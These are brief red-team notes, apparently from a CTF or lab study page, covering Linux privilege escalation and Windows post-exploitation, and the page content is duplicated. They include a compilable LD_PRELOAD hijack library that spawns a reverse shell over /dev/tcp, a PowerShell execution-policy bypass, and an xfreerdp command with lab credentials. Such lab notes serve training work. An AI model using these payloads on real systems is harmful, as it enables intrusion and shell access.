Notes

Reconncenc

If found id_rsa make chmod 600 to access file

Initial Access

Privesc

Find SUID Files like (u+s,g+s)
in Linux/Unix Search in process running can find any suspicious process like use systemctl list-units --type=service --all
LD_PRELOAD bypass

Here is a library you can compile to abuse the LD_PRELOAD env variable:

#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>

uid_t getuid(void){
	unsetenv("LD_PRELOAD");
	system("bash -c \"sh -i >& /dev/tcp/127.0.0.1/1234 0>&1\"");
	return 1;
}

Post-exploitation

In Windows use Powershell -ep bypass then use this command to get important files

Get-ChildItem -Recurse -File -ErrorAction SilentlyContinue | Select-Object FullName

if Port 3389 is Open try connect using rdesktop or xfreerdp and use /drive:.,kali-share to shere your partition on attacker Machine

xfreerdp /v:cyberlens.thm /u:CyberLens /p:HackSmarter123 /size:80% /drive:.,kali-share

PreviousRed Team Note

Last updated 5 months ago

Notes

Reconncenc

If found id_rsa make chmod 600 to access file

Initial Access

Privesc

Find SUID Files like (u+s,g+s)
in Linux/Unix Search in process running can find any suspicious process like use systemctl list-units --type=service --all
LD_PRELOAD bypass

Here is a library you can compile to abuse the LD_PRELOAD env variable:

#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>

uid_t getuid(void){
	unsetenv("LD_PRELOAD");
	system("bash -c \"sh -i >& /dev/tcp/127.0.0.1/1234 0>&1\"");
	return 1;
}

Post-exploitation

In Windows use Powershell -ep bypass then use this command to get important files

Get-ChildItem -Recurse -File -ErrorAction SilentlyContinue | Select-Object FullName

if Port 3389 is Open try connect using rdesktop or xfreerdp and use /drive:.,kali-share to shere your partition on attacker Machine

xfreerdp /v:cyberlens.thm /u:CyberLens /p:HackSmarter123 /size:80% /drive:.,kali-share

PreviousRed Team Note

Last updated 5 months ago

LD_PRELOAD bypass

LD_PRELOAD bypass